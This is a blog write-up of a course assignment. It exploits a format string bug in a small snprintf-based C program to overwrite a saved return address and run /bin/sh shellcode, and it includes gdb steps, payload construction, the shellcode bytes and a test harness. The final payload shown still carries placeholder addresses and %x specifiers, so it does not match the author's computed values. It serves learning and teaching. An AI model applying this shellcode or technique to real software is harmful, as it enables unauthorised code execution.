Part 1:
https://dev.to/duracellrabbid/journey-to-understand-format-string-attack-part-1-5dda
In Part 1, one of the motivations that made me write these posts were because it took me a freaking long time to understand how format string attack works. To give you some context, I first knew about it in late 2021/early 2022. Took me a good 2.5 years to fully understand how it works. Still, I wanted to share my learning journey and where I eventually ended in.
The Task
Here, I will move on to talk about the assignment that helped propelled me into the journey. In my assignment, I was asked to run a shellcode using a "memory exploit" in the program. The source code was provided and it looked something like that:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int vul1(char *arg)
{
char buffer[400];
snprintf(buffer, sizeof buffer, arg);
return 0;
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "cstarget: argc != 2\n");
exit(EXIT_FAILURE);
}
vul1(argv[1]);
return 0;
}
The code can be compiled in gcc using the following flags:
-mpreferred-stack-boundary=2 -ggdb -m32 -L/usr/lib32 -fno-stack-protector
Unfortunately, the source code and compilation flags were only for references. I had to perform the attack on the given binary, with ASLR turned off.
Analysis
First of all, we can see that the binary needs to run with one, and only one argument.
Then it will use snprintf
to print this argument into a buffer
of 400 chars. Initially, I thought this can be done using buffer overflow but snprintf
is checking against the size of buffer
. So this makes BoF attack unviable.
We are talking about format string vulnerabilities right? Guess what? We have snprintf
!
snprintf
does not produce an output. It basically prints the specified string till a specified length in the specified format to a buffer. A quick run on the binary with argument also confirms that.
No fear though! We have GDB. GDB is our friend. Let's bring along GEF for the ride as well.
From the screenshots, I noticed that buffer is at $esp
. My return address is stored from +0x198 from buffer. In any case, I knew that the saved instruction address is 0x56556236
.
The simplest approach is to have this address overridden to run my shellcode. Since the stack is executable, there are 3 potential places where I can run the shellcodes: buffer
, arg
and environment variables. I chose buffer
as it is the easiest.
In addition, I observed one issue. Look at the screenshot where I planted 64 NOPs
into the stack.
Note that the start of buffer
changes as the size of the argument for vul1
increases. This is kind of expected. Remember my uglily drawn stack in Part 1:
Since parameters are placed before the return address, a parameter of bigger size will definitely push the stack further down.
Is that a concern for us? Yes and no. If we are not careful, the addresses that we need to write to will be wrong. However, if we formulate the format string right, we can get the addresses right where we want it.
The format string
In this round, my approach will be:
<shellcodes> + <NOP paddings> + <address1> + <address2> + %Ax%G$n%Bx%H$n
Shellcode + NOPs
= 64 bytes (you can try any number that is multiple of 4)
address1 = the stack memory address that holds the return address
address2 = basically address1 + 0x2
A = lower order of the starting address of buffer - 64 - 8
B = higher order of starting address of buffer - lower order of starting address of buffer
G = (64 / 4) + 1
H = G + 1
Sounds abstract? I guessed it. Let's use Excel to visualize the stack.
Few observations here:
- The shellcode is at the start of the
buffer
. This is because the starting address of thebuffer
is relatively easier to obtain. Not everyday is a Saturday, so when you get the chance to be lazy, you take it. - The
NOPs
are there to align the stack. Imagine if we do not have theNOPs
, this will happen
We will not be able to obtain the full addresses. Setting the NOP
paddings assure us that our addresses will always be on the 17th and 18th position of the stack. (Take 1 position on the stack as 4 bytes, since we are working on 32 bits)
Finding the addresses
I like to break my tasks down into smaller pieces. Let's break the format string into steps.
- 64
NOPs
- They are placeholders for the shellcode
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64)")
- 64
NOPs
+ the 2 placeholder addresses
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4)")
- The entire format string in placeholder values
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4 + b'%12356x%17\$x%12345x%18\$x')")
From here, we know that our shellcodes will start at 0xffffcdb4. We also know that the saved eip will be 0xffffcf4c. With these information:
address1 = \x4c\xcf\xff\xff
address2 = \x4e\xcf\xff\xff
A = 0xcdb4 - 72 = 52588
B = 0xffff - 0xcdb4 = 12875
The shellcode
For the purpose of the exercise, we will use the following shellcode from this article:
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
The next question is, how do we know if the shellcode works? We can test it with a simple C program.
// Filename: shellcode.c
// Compile: gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode
#include<stdio.h>
#include<string.h>
void callShell() {
const char code[] = \
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
printf("Shellcode Length: %d\n", strlen(code));
((void(*)(void))code)();
}
void main()
{
callShell();
}
Nice, the length of the shellcode is 45, so we will just need 19 more NOPs
to pad it. Some of you may have noticed that I could have just pad 3 more NOPs
. But I like 64, so I go with 64.
shellcode + NOPs = \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
The full format string should be:
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\xff\xee\xee\xee\xee%12345x%17$x%12345x%18$x
Now we will test it out:
YES! A shell is opened. Mission accomplished? Not quite. There are more to the assignment, but it is beyond the scope of this write-up.
...One more thing
In essence, this should not be a difficult exercise for most seasoned CTF players. However, it is easy to get segmentation faults when working with format string attacks. It will be frustrating for beginners like me. I found that, the best thing to do is to break the tasks down into smaller pieces, and figure the smaller pieces individually.
To quote Dr Andrew Wiles: I think I'll stop here.
Top comments (0)